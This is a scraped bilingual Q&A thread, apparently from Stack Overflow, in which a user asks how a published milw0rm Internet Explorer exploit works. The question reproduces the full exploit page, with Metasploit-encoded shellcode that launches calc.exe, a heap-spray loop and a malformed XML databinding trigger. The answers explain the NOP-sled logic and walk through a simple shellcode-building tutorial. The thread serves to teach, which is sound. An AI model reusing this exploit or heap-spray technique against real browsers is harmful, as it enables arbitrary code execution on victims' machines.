milw0rm 堆喷射漏洞是如何工作的?
我通常阅读 JavaScript 代码并不困难,但对于这个我无法弄清楚其中的逻辑。 该代码来自 4 天前发布的漏洞利用程序。 您可以在 milw0rm 找到它。
这是代码:
<html>
<div id="replace">x</div>
<script>
// windows/exec - 148 bytes
// http://www.metasploit.com
// Encoder: x86/shikata_ga_nai
// EXITFUNC=process, CMD=calc.exe
var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");
// ugly heap spray, the d0nkey way!
// works most of the time
var spray = unescape("%u0a0a%u0a0a");
do {
spray += spray;
} while(spray.length < 0xd0000);
memory = new Array();
for(i = 0; i < 100; i++)
memory[i] = spray + shellcode;
xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://ਊਊ.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";
tag = document.getElementById("replace");
tag.innerHTML = xmlcode;
</script>
</html>
这是我认为它的作用,我希望你帮助我解决我误解的部分。
变量 shellcode 包含打开 calc.exe 的代码。 我不明白他们是如何找到那个奇怪的字符串的。 任何想法?
第二件事是变量spray。 我不明白这个奇怪的循环。
第三件事是从未在任何地方使用过的变量内存。 他们为什么要创造它?
最后一件事:XML 标签在页面中起什么作用?
目前我已经有了很好的答案,但大多都是非常笼统的答案。 我想要更多关于代码价值的解释。 例如 unescape("%u0a0a%u0a0a");。 这是什么意思? 循环也是如此:为什么开发人员要写: length < 0xd0000? 我想更深入地理解,而不仅仅是这段代码的理论。
I usually do not have difficulty to read JavaScript code but for this one I can’t figure out the logic. The code is from an exploit that has been published 4 days ago. You can find it at milw0rm.
Here is the code:
<html>
<div id="replace">x</div>
<script>
// windows/exec - 148 bytes
// http://www.metasploit.com
// Encoder: x86/shikata_ga_nai
// EXITFUNC=process, CMD=calc.exe
var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");
// ugly heap spray, the d0nkey way!
// works most of the time
var spray = unescape("%u0a0a%u0a0a");
do {
spray += spray;
} while(spray.length < 0xd0000);
memory = new Array();
for(i = 0; i < 100; i++)
memory[i] = spray + shellcode;
xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://ਊਊ.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";
tag = document.getElementById("replace");
tag.innerHTML = xmlcode;
</script>
</html>
Here is what I believe it does and I would like you to help me for the part that I misunderstand.
The variable shellcode contains the code to open the calc.exe. I do not get how they have found that weird string. Any idea?
The second thing is the variable spray. I do not understand this weird loop.
The third thing is the variable memory that is never used anywhere. Why do they create it?
Last thing: what does the XML tag do in the page?
For the moment I have good answers but mostly very general ones. I would like more explanations of the value of the code. An example is unescape("%u0a0a%u0a0a");. What does it mean? Same thing for the loop: why did the developer write: length < 0xd0000? I would like a deeper understanding, not only the theory of this code.
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(7)
shellcode 包含一些可进行实际利用的 x86 汇编指令。
spray创建一长串指令,并将其放入内存中。 由于我们通常无法找到 shellcode 在内存中的确切位置,因此我们在它前面放置了很多nop指令并跳转到那里的某个地方。内存数组将保存实际的x86代码以及跳转机制。 我们会将精心设计的 XML 提供给有错误的库。 当它被解析时,该错误将导致指令指针寄存器被分配到我们的漏洞利用中的某个位置,从而导致任意代码执行。要更深入地理解,您实际上应该弄清楚 x86 代码中的内容。
unscape将用于将字符串表示的字节序列放入spray变量中。 它是有效的 x86 代码,填充了堆的一大块并跳转到 shellcode 的开头。 结束条件的原因是脚本引擎的字符串长度限制。 字符串不能大于特定长度。在 x86 汇编中,
0a0a表示或 cl、[edx]。 就我们的利用而言,这实际上相当于nop指令。 无论我们在spray中跳转到哪里,我们都会到达下一条指令,直到到达shellcode,这是我们实际想要执行的代码。如果您查看 XML,您会发现
0x0a0a也在那里。 准确地描述发生的情况需要对漏洞利用有具体的了解(您必须知道错误在哪里以及它是如何被利用的,而我不知道)。 然而,我们似乎通过将innerHtml设置为该恶意 XML 字符串来强制 Internet Explorer 触发有问题的代码。 Internet Explorer 尝试解析它,并且有错误的代码以某种方式控制了数组所在的内存位置(因为它是一个大块,所以跳转到那里的可能性很高)。 当我们跳转到那里时,CPU 将继续执行或 cl, [edx]指令,直到到达放入内存的 shellcode 的开头。我已经反汇编了 shellcode:
理解这个 shellcode 需要 x86 汇编知识和 MS 库本身的问题(知道我们到达这里时的系统状态是什么),而不是 JavaScript! 此代码将依次执行
calc.exe。The shellcode contains some x86 assembly instructions that will do the actual exploit.
spraycreates a long sequence of instructions that will be put inmemory. Since we can't usually find out the exact location of our shellcode in memory, we put a lot ofnopinstructions before it and jump to somewhere there. Thememoryarray will hold the actual x86 code along with the jumping mechanism. We'll feed the crafted XML to the library which has a bug. When it's being parsed, the bug will cause the instruction pointer register to be assigned to somewhere in our exploit, leading to arbitrary code execution.To understand more deeply, you should actually figure out what is in the x86 code.
unscapewill be used to put the sequence of bytes represented of the string in thesprayvariable. It's valid x86 code that fills a large chunk of the heap and jumps to the start of shellcode. The reason for the ending condition is string length limitations of the scripting engine. You can't have strings larger than a specific length.In x86 assembly,
0a0arepresentsor cl, [edx]. This is effectively equivalent tonopinstruction for the purposes of our exploit. Wherever we jump to in thespray, we'll get to the next instruction until we reach the shellcode which is the code we actually want to execute.If you look at the XML, you'll see
0x0a0ais there too. Exactly describing what happens requires specific knowledge of the exploit (you have to know where the bug is and how it's exploited, which I don't know). However, it seems that we force Internet Explorer to trigger the buggy code by setting theinnerHtmlto that malicious XML string. Internet Explorer tries to parse it and the buggy code somehow gives control to a location of memory where the array exists (since it's a large chunk, the probability of jumping there is high). When we jump there the CPU will keep executingor cl, [edx]instructions until in reaches the beginning of shellcode that's put in memory.I've disassembled the shellcode:
Understanding this shellcode requires x86 assembly knowledge and the problem in the MS library itself (to know what the system state is when we reach here), not JavaScript! This code will in turn execute
calc.exe.这看起来像是 Microsoft 发现的最近的 Internet Explorer 错误的漏洞发布了紧急补丁。 它利用了 Microsoft XML 处理程序的数据绑定功能中的一个缺陷,导致堆内存被错误地释放。
Shellcode 是错误发生时将运行的机器代码。 Spray 和内存只是在堆上分配的一些空间,以帮助发生可利用的情况。
This looks like an exploit of the recent Internet Explorer bug that Microsoft released the emergency patch for. It uses a flaw in the databinding feature of Microsoft's XML handler, that causes heap memory to be deallocated incorrectly.
Shellcode is machine code that will run when the bug occurs. Spray and memory are just some space allocated on the heap to help the exploitable condition occur.
堆喷射是利用浏览器内容的常见方法,如果您喜欢它,您可以找到几个类似这样的帖子:http://sf-freedom.blogspot.com/2006/06/heap-spraying-introduction.html
Heap Spraying is common way to exploit browser stuff, if you are into it you can find several posts like this : http://sf-freedom.blogspot.com/2006/06/heap-spraying-introduction.html
每当我看到漏洞利用讨论中未解决的内存时,我的第一个想法是该漏洞利用是某种缓冲区溢出,在这种情况下,内存要么导致缓冲区溢出,要么在缓冲区溢出后被访问。
Any time I see memory that doesn't get addressed in an exploit discussion, my first thought is that the exploit is some sort of buffer overflow, in which case the memory is either causing the buffer to overflow or is being accessed once the buffer overflows.
这是来自metasploit,这意味着它正在使用metasploit shell 代码之一。 它是开源的,所以你可以去获取它:http://www.metasploit.com/
This is from metasploit, that means it's using one of metasploit shell codes. It's open source so you can go and grab it : http://www.metasploit.com/
请参阅HTML 中的字符编码。
它是编码为字符串的二进制数据,JavaScript 正在对其进行解码。
也是 XSS 的常见形式。
您可以在此处查看所有编码技巧:
http://www.owasp.org/index .php/类别:OWASP_CAL9000_Project
See Character encodings in HTML.
It's binary data encoded as a string, which JavaScript is decoding.
Common form of XSS also.
You can see all the encoding tricks here:
http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project
简单 shellcode 示例
我相信汇编 at&t 语法 x86 中的
Hello world(培训中的向导)。 设置文件:
vim shellcodeExample.s像这样编译:
as -o shellcodeExample.o shellcodeExample.s ; ld -s -o shellcode shellcodeExample.o现在您有了一个可以打印 hello world 的二进制文件。
要将二进制文件转换为 shell 代码,请输入:
objdump -D shellcode您将得到输出:
现在,如果您查看第四行的文本,您将看到:
400078: eb 1a jmp 0x400094表示
eb 1a的部分是汇编指令jmp one的十六进制表示,其中“one”是字符串的内存地址。要准备执行 shellcode,请打开另一个文本文件并将十六进制值存储在字符数组中。 要正确格式化 shell 代码,请在每个十六进制值之前键入
\x。根据 objdump 命令输出,即将出现的 shell 代码示例将如下所示:
此示例使用 C 作为数组。
现在您已经有了可以写入 stdout“hello world”的工作 shellcode,
您可以通过将其放入漏洞中来测试 shell 代码,也可以编写以下 c 程序来测试它:
要编译程序,请输入:
run with
./运行您知道有一个简单的 shellcode 开发的工作示例,已在 linux mint/debian 中进行了测试。
Simple shellcode example
Hello world in assembly at&t syntax x86 I believe (Wizard in Training).
set up the file:
vim shellcodeExample.scompile like so:
as -o shellcodeExample.o shellcodeExample.s ; ld -s -o shellcode shellcodeExample.oNow you have a binary that prints out hello world.
to convert the binary into shell code type in:
objdump -D shellcodeyou will get the output:
Now if you look on the 4th line with text you will see:
400078: eb 1a jmp 0x400094the part that says
eb 1ais the hexadecimal representation of the assembly instructionjmp onewhere "one" is the memory address of your string.to prep your shellcode for execution open up another text file and store the hex values in a character array. To format the shell code correctly you type in a
\xbefore every hex value.the upcoming shell code example will look like the following according to the objdump command output:
This example uses C for the array.
Now you have working shellcode that will write to stdout "hello world"
you can test the shell code by placing it in a vulnerability or you can write the following c program to test it:
To compile the program type in:
run with
./runYou know have a working example of simple shellcode development that was tested in linux mint/debian.